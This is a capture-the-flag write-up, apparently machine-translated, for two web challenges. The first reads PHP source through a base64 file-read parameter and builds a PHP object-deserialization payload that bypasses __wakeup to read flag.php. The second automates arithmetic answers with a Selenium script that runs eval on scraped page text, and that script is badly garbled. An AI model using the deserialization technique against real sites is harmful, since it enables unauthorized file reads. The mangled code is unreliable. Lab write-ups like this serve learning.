1.easyphp
1.1. Title Description
The first is the subject of a picture that does not exist
View source found only one sentence
<img src="show.php?img=aGludC5qcGc=" width="100%"/>
Opening the source code of the image links to jump to the following page
Img content behind like base64-encoded, decoded verified as base64-encoded, after the reduction is hint.jpg.
Try to back img parameters flag.jpg, flag.php, after the flag instead of the base64-encoded visit, did not get to valuable content
Direct access to the index.php or show.php not see anything, so see if you can use this parameter to read img two php source
index.php base64 encoded as aW5kZXgucGhw
show.php is base64 encoded c2hvdy5waHA =
After attempts, then have to be read by the content source, the content are as follows
index.php
<?php require_once('hint.php'); $x = new hint(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize($g); echo $x; } ?> <img src="show.php?img=aGludC5qcGc=" width="100%"/>
show.php
<?php $f = $_GET['img']; if (!empty($f)) { $f = base64_decode($f); if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE && stripos($f,'flag')===FALSE) { readfile($f); } else { echo "File not found!"; } } ?>
From index.php saw there is a source hint.php, read in the same manner, as follows
hint.php is base64 encoded aGludC5waHA =
<?php error_reporting(0); //flag is in flag.php class hint{ public $file=''; function __destruct(){ if(!empty($this->file)) { if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false) show_source(dirname (__FILE__).'/'.$this ->file); else die('Wrong filename.'); }} function __wakeup(){ $this-> file='index.php'; } public function __toString(){return '' ;}} ?>
1.2. Code audit
hint.php which tells us flag in flag.php in, so we have to try to read into this php file
show.php inside with stripos limits what we read, we can not be read by show.php way to flag.php
hint hint which defines a class that has a show_source (dirname (__FILE __) '/' $ this -> file..); method, we can read the file php
In the index.php which used unserialize () function is used to deserialize a hint object, we can try to use deserialized way to read flag.php
1.3.Payload construction
Copy hint.php locally, and then add the following lines of code, serialized string acquired by the web
$x=new hint(); $x->file="flag.php"; echo serialize($x);
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
Meaning serialized string can refer to: https://www.cnblogs.com/dogecheng/p/11652022.html
According to the source code of index.php, we put the string assigned to class just fine, but did not get flag
After that check online some information through deserializing after unserialize, also calls __wakeup () method, it will file to index.php, so reading is not flag.php
We need to bypass __wakeup () function, but the bypass is simple. When serialized string, represents the number of object attribute value is greater than the actual number of properties , it knows to perform a wakeup method.
Our original serialized string:
O:4:"hint":1:{s:4:"file";s:8:"flag.php";}
We just need a change larger than its number to
O:4:"hint":2:{s:4:"file";s:8:"flag.php";}
This time to re-submit the request will be able to get the flag
2.calculate
2.1. Title Description
The following questions
10 requires us to answer the math. After testing, each question to be in within three seconds of correct answers, wrong answers, or the number of overtime clear answer to the right questions. And answer after an interval of 1 sec .
Page source code below, evaluate the expression in a div
<h1>calculate</h1> <p>Answer the questions for 10 times and you can get flag.</p> <p> You Have answered 0銆€questions;</p> <form action="" method="post"> <div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div><div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div><div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div><div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div> <input type="text" name="ans"> <input type="submit" value="send!"> </form>
2.2. Scripting
Beginning with the requests python library to do, without success, to switch selenium do will be successful, the code is as follows:
from selenium import webdriver from bs4 import BeautifulSoup import time driver=webdriver.Firefox() driver.get("http://****:13002/") def submit(driver): # 获取源码 source = driver.page_source # BeautifulSoup解析 soup = BeautifulSoup(source, "lxml") all_div = soup.find_all(name="div") # 获取表达式 s = "" for I in all_div: S = S + i.contents [0] # remove equals S = S [: -. 1 ] Print (S) # calculates RES = the eval (S) # provide answers Element driver.find_element_by_name = ( " ANS " ) element.send_keys (RES) # wait 1.1 seconds the time.sleep (1.1 ) # submit answers driver.find_element_by_xpath ( " / HTML / body / form / the INPUT [2] " ) .click () Print ( " the Click ") for i in range(10): submit(driver)
After answering 10 flag will appear on the page